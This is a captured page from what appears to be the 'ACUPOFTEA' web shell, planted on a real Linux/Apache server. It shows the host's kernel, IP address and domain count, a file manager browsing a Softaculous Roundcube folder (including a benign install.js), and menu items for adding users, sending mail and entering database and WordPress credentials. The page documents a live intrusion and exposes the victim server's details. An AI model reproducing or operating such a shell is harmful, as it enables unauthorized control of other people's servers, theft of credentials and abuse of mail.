System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
var
/
softaculous
/
roundcube
/
216.73.216.50
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
install.js
////////////////////////////////////////////////////////////// // install.js // Checks the installation form of the software being // installed by SOFTACULOUS // NOTE: 1) Only formcheck() function will be called. // 2) A software Vendor can use the same name for every // field to be checked as in install.xml . It can be // called using $('fieldname').value or any property // 3) Must Return true or false // ---------------------------------------------------------- // Please Read the Terms of use at http://www.softaculous.com // ---------------------------------------------------------- // (c)Softaculous Inc. ////////////////////////////////////////////////////////////// function formcheck(){ //Check the Admin Email if(window.check_punycode){ if(!check_punycode($('admin_email').value)){ alert('{{err_ademail}}'); return false; } return true; } return true; }; jQuery(document).ready(function(){ var domain = jQuery("#softdomain").val(); jQuery("#imap").val("imap."+domain); jQuery("#smtp").val("smtp."+domain); jQuery("#softdomain").change(function(){ var domain = jQuery(this).val(); jQuery("#imap").val("imap."+domain); jQuery("#smtp").val("smtp."+domain); }); //alert("imap."+domain); });
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2025-06-03 09:39:27
..
DIR
-
drwxr-xr-x
2025-10-25 09:38:52
images
DIR
-
drwxr-xr-x
2025-06-03 09:39:27
php53
DIR
-
drwxr-xr-x
2025-06-03 09:39:27
php56
DIR
-
drwxr-xr-x
2025-06-03 09:39:27
php71
DIR
-
drwxr-xr-x
2025-06-03 09:39:27
php81
DIR
-
drwxr-xr-x
2025-06-03 09:39:27
php82
DIR
-
drwxr-xr-x
2025-06-03 09:39:27
changelog.txt
text/plain
3.51 KB
-rw-r--r--
2025-06-02 05:39:52
clone.php
text/x-php
3.39 KB
-rw-r--r--
2025-06-02 07:54:14
config.inc.php
text/x-php
3.9 KB
-rw-r--r--
2025-02-10 04:28:38
fileindex.php
text/plain
203 B
-rw-r--r--
2021-12-23 06:54:36
import.php
text/x-php
3.3 KB
-rw-r--r--
2025-06-02 07:54:14
info.xml
text/html
2.94 KB
-rw-r--r--
2025-06-02 05:39:52
install.js
text/plain
1.25 KB
-rw-r--r--
2021-12-23 06:54:36
install.php
text/x-php
6.54 KB
-rw-r--r--
2025-06-02 07:54:14
install.xml
text/html
3.73 KB
-rw-r--r--
2021-12-23 06:54:36
md5
text/plain
2.2 KB
-rw-r--r--
2025-06-02 07:54:14
notes.txt
text/plain
1.23 KB
-rw-r--r--
2023-07-03 06:47:16
remove.php
text/x-php
3.11 KB
-rw-r--r--
2025-06-02 07:54:14
upgrade.php
text/x-php
7.04 KB
-rw-r--r--
2025-06-02 07:54:14
upgrade.xml
text/plain
341 B
-rw-r--r--
2021-12-23 06:54:36
~ ACUPOFTEA - mail.ontime-ae.com